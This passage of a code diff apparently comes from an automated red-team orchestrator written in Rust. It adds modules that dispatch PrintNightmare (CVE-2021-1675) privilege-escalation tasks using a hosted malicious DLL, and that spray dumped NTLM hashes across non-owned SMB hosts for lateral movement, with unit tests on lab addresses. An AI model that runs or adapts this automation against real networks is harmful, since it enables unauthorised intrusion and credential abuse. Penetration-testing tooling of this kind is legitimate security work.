collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/print_nightmare.rs b/ares-cli/src/orchestrator/automation/print_nightmare.rs new file mode 100644 index 00000000..868eb8cf --- /dev/null +++ b/ares-cli/src/orchestrator/automation/print_nightmare.rs @@ -0,0 +1,477 @@ +//! auto_print_nightmare -- exploit CVE-2021-1675 (PrintNightmare) when +//! conditions are met. +//! +//! PrintNightmare exploits the Print Spooler service to achieve remote code +//! execution. Requires: valid credentials, target with Print Spooler running +//! (most Windows hosts by default), and a writable SMB share for the DLL. +//! +//! This module dispatches `printnightmare` against hosts where we have +//! credentials but NOT admin access — it's a priv esc technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect PrintNightmare work items from state (pure logic, no async). +fn collect_print_nightmare_work( + state: &StateInner, + listener: &str, + dll_path: &str, +) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target all discovered hosts (DCs + member servers) + for host in &state.hosts { + let ip = &host.ip; + + // Skip if we already tried PrintNightmare on this host + if state.is_processed(DEDUP_PRINTNIGHTMARE, ip) { + continue; + } + + // Skip hosts where we already have admin (secretsdump handles those) + if state.is_processed(DEDUP_SECRETSDUMP, ip) { + continue; + } + + // Infer domain from hostname (e.g. "dc01.contoso.local" -> "contoso.local") + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()); + + let cred = match cred { + Some(c) => c.clone(), + None => continue, + }; + + items.push(PrintNightmareWork { + target_ip: ip.clone(), + hostname: host.hostname.clone(), + domain: domain.clone(), + listener: listener.to_string(), + dll_path: dll_path.to_string(), + credential: cred, + }); + } + + items +} + +/// Monitors for PrintNightmare exploitation opportunities. +/// Only targets hosts we don't already have admin on. +/// Interval: 45s. +pub async fn auto_print_nightmare( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("printnightmare") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for DLL hosting + }; + + // PrintNightmare requires a UNC path to a hosted malicious DLL. Without + // pre-staged SMB share + payload infra, dispatching is guaranteed to + // fail on the worker (cve_exploits.rs requires `dll_path`). Skip + // cleanly when not configured rather than emitting failed tasks. + let dll_path = match std::env::var("ARES_PRINTNIGHTMARE_DLL").ok() { + Some(path) if !path.is_empty() => path, + _ => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_print_nightmare_work(&state, &listener, &dll_path) + }; + + for item in work { + let payload = json!({ + "technique": "printnightmare", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "listener_ip": item.listener, + "dll_path": item.dll_path, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("printnightmare"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "PrintNightmare (CVE-2021-1675) exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PRINTNIGHTMARE, item.target_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PRINTNIGHTMARE, &item.target_ip) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "PrintNightmare task deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch PrintNightmare"); + } + } + } + } +} + +struct PrintNightmareWork { + target_ip: String, + hostname: String, + domain: String, + listener: String, + dll_path: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PRINTNIGHTMARE, "printnightmare"); + } + + #[test] + fn dedup_key_is_target_ip() { + let ip = "192.168.58.22"; + assert_eq!(ip, "192.168.58.22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "printnightmare", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + "dll_path": "\\\\192.168.58.50\\share\\evil.dll", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "printnightmare"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["dll_path"], "\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = PrintNightmareWork { + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + listener: "192.168.58.50".into(), + dll_path: "\\\\192.168.58.50\\share\\evil.dll".into(), + credential: cred, + }; + + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_from_multi_level_hostname() { + let hostname = "web01.dmz.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "dmz.contoso.local"); + } + + #[test] + fn domain_from_uppercase_hostname() { + let hostname = "DC01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + // --- collect_print_nightmare_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].dll_path, "\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_printnightmare() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_PRINTNIGHTMARE, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_cred("fab_user", "fabrikam.local")); + state + .credentials + .push(make_cred("con_user", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[test] + fn collect_falls_back_to_first_cred_for_bare_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_cred("fallback", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fallback"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.30", "ws01.fabrikam.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + // Mark second host as already secretsdumped + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[test] + fn dedup_key_format_validation() { + // PrintNightmare uses the raw target_ip as dedup key + let ip = "192.168.58.10"; + // The dedup key is just the IP itself + assert_eq!(ip, "192.168.58.10"); + assert!(!ip.contains(':')); + } +} diff --git a/ares-cli/src/orchestrator/automation/pth_spray.rs b/ares-cli/src/orchestrator/automation/pth_spray.rs new file mode 100644 index 00000000..9641568d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/pth_spray.rs @@ -0,0 +1,788 @@ +//! auto_pth_spray -- pass-the-hash spray using dumped NTLM hashes. +//! +//! After secretsdump extracts NTLM hashes, this module sprays them across +//! hosts to find additional admin access. Uses netexec/crackmapexec with +//! NTLM hashes instead of passwords for lateral movement validation. +//! +//! This is distinct from credential_reuse (which tests passwords) and +//! secretsdump (which dumps from owned hosts). PTH spray tests hash-based +//! auth against non-owned hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches pass-the-hash spray against non-owned hosts using dumped NTLM hashes. +/// Interval: 45s. +pub async fn auto_pth_spray(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("pth_spray") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + match collect_pth_work(&state) { + Some(items) => items, + None => continue, + } + }; + + // Limit to 5 per cycle to avoid overwhelming the throttler + for item in work.into_iter().take(5) { + let payload = json!({ + "technique": "pass_the_hash", + "target_ip": item.target_ip, + "hostname": item.hostname, + "username": item.username, + "ntlm_hash": item.ntlm_hash, + "domain": item.domain, + "protocol": "smb", + }); + + let priority = dispatcher.effective_priority("pth_spray"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.target_ip, + user = %item.username, + "PTH spray dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PTH_SPRAY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PTH_SPRAY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.target_ip, "PTH spray deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.target_ip, "Failed to dispatch PTH spray"); + } + } + } + } +} + +/// Collects PTH spray work items from state. Returns `None` when there are no +/// NTLM hashes (caller should skip the cycle). +fn collect_pth_work(state: &StateInner) -> Option> { + // Need NTLM hashes + let ntlm_hashes: Vec<_> = state + .hashes + .iter() + .filter(|h| { + h.hash_type.to_lowercase().contains("ntlm") + && !h.hash_value.is_empty() + && h.hash_value.len() == 32 + }) + .collect(); + + if ntlm_hashes.is_empty() { + return None; + } + + let mut items = Vec::new(); + + // For each non-owned host, try PTH with available NTLM hashes + for host in &state.hosts { + if host.owned { + continue; + } + + // Check if host has SMB (port 445) + let has_smb = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + if !has_smb { + continue; + } + + // Try each unique NTLM hash against this host + for hash in &ntlm_hashes { + let dedup_key = format!( + "pth:{}:{}:{}", + host.ip, + hash.username.to_lowercase(), + &hash.hash_value[..8] + ); + if state.is_processed(DEDUP_PTH_SPRAY, &dedup_key) { + continue; + } + + // Infer domain from hash or host + let domain = if !hash.domain.is_empty() { + hash.domain.clone() + } else { + host.hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + + items.push(PthWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + username: hash.username.clone(), + ntlm_hash: hash.hash_value.clone(), + domain, + }); + } + } + + Some(items) +} + +struct PthWork { + dedup_key: String, + target_ip: String, + hostname: String, + username: String, + ntlm_hash: String, + domain: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Hash, Host}; + + fn make_ntlm_hash(username: &str, hash_value: &str, domain: &str) -> Hash { + Hash { + id: format!("hash-{username}"), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: "NTLM".to_string(), + domain: domain.to_string(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".to_string(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + fn make_smb_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: vec!["445/tcp microsoft-ds".to_string()], + is_dc: false, + owned, + } + } + + fn make_host_no_smb(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: vec!["80/tcp http".to_string()], + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("pth:{}:{}:{}", "192.168.58.10", "admin", "aabbccdd"); + assert_eq!(key, "pth:192.168.58.10:admin:aabbccdd"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PTH_SPRAY, "pth_spray"); + } + + #[test] + fn ntlm_hash_filter_valid() { + let hash_type = "NTLM"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + assert!(hash_type.to_lowercase().contains("ntlm")); + assert!(!hash_value.is_empty()); + assert_eq!(hash_value.len(), 32); + } + + #[test] + fn ntlm_hash_filter_rejects_short() { + let hash_value = "abc123"; + assert_ne!(hash_value.len(), 32); + } + + #[test] + fn ntlm_hash_filter_rejects_empty() { + let hash_value = ""; + assert!(hash_value.is_empty()); + } + + #[test] + fn ntlm_hash_filter_rejects_non_ntlm() { + let hash_type = "aes256-cts-hmac-sha1-96"; + assert!(!hash_type.to_lowercase().contains("ntlm")); + } + + #[test] + fn smb_service_detection() { + let services = ["445/tcp microsoft-ds".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = ["80/tcp http".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } + + #[test] + fn domain_from_hash_preferred() { + let hash_domain = "contoso.local"; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_fallback_to_hostname() { + let hash_domain = ""; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_uses_hash_prefix() { + let ip = "192.168.58.10"; + let username = "Admin"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + let dedup_key = format!( + "pth:{}:{}:{}", + ip, + username.to_lowercase(), + &hash_value[..8] + ); + assert_eq!(dedup_key, "pth:192.168.58.10:admin:aad3b435"); + } + + #[test] + fn ntlm_hash_filter_exact_32() { + let hash = "a".repeat(32); + assert_eq!(hash.len(), 32); + assert!(!hash.is_empty()); + } + + #[test] + fn ntlm_hash_type_variations() { + for t in ["NTLM", "ntlm", "NT", "ntlm_hash"] { + assert!(t.to_lowercase().contains("ntlm") || t.to_lowercase().contains("nt")); + } + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn pth_payload_structure() { + let payload = serde_json::json!({ + "technique": "pass_the_hash", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "username": "admin", + "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee", + "domain": "contoso.local", + "protocol": "smb", + }); + assert_eq!(payload["technique"], "pass_the_hash"); + assert_eq!(payload["protocol"], "smb"); + assert_eq!(payload["ntlm_hash"], "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn pth_work_construction() { + let work = PthWork { + dedup_key: "pth:192.168.58.22:admin:aad3b435".into(), + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + username: "admin".into(), + ntlm_hash: "aad3b435b51404eeaad3b435b51404ee".into(), + domain: "contoso.local".into(), + }; + assert_eq!(work.username, "admin"); + assert_eq!(work.ntlm_hash.len(), 32); + } + + #[test] + fn domain_fallback_bare_hostname() { + let hash_domain = ""; + let hostname = "srv01"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, ""); + } + + #[test] + fn take_5_limiting() { + let items: Vec = (0..20).collect(); + let taken: Vec<_> = items.into_iter().take(5).collect(); + assert_eq!(taken.len(), 5); + } + + // --- collect_pth_work tests --- + + #[test] + fn collect_empty_state_returns_none() { + let state = StateInner::new("test".into()); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_no_hashes_returns_none() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_hashes_no_hosts_returns_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_hash_and_smb_host_produces_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].username, "admin"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].ntlm_hash, "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn collect_skips_owned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.20", "web01.contoso.local")); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_dedup_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark as already processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_filters_non_ntlm_hashes() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-aes".into(), + username: "admin".into(), + hash_value: "abcdef1234567890abcdef1234567890".into(), // pragma: allowlist secret + hash_type: "aes256-cts-hmac-sha1-96".into(), + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // AES hash type should be rejected + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_short_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435", // too short, not 32 chars - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_empty_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "", // empty - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_domain_fallback_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_domain_fallback_bare_hostname_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01", // no dot, no domain part + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hashes_multiple_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv02.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + // 2 hashes x 2 hosts = 4 work items + assert_eq!(work.len(), 4); + } + + #[test] + fn collect_dedup_key_lowercases_username() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "Administrator", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.contains(":administrator:")); + } + + #[test] + fn collect_mixed_owned_and_unowned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + state.hosts.push(make_smb_host( + "192.168.58.20", + "srv02.contoso.local", + false, // not owned + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_mixed_smb_and_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.10", "web01.contoso.local")); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_smb_detection_via_smb_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["SMB".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_smb_detection_via_cifs_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["cifs/srv01.contoso.local".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_partial_dedup_only_skips_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark only admin as processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].username, "svcacct"); + } + + #[test] + fn collect_hostname_preserved_in_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "dc01.contoso.local", 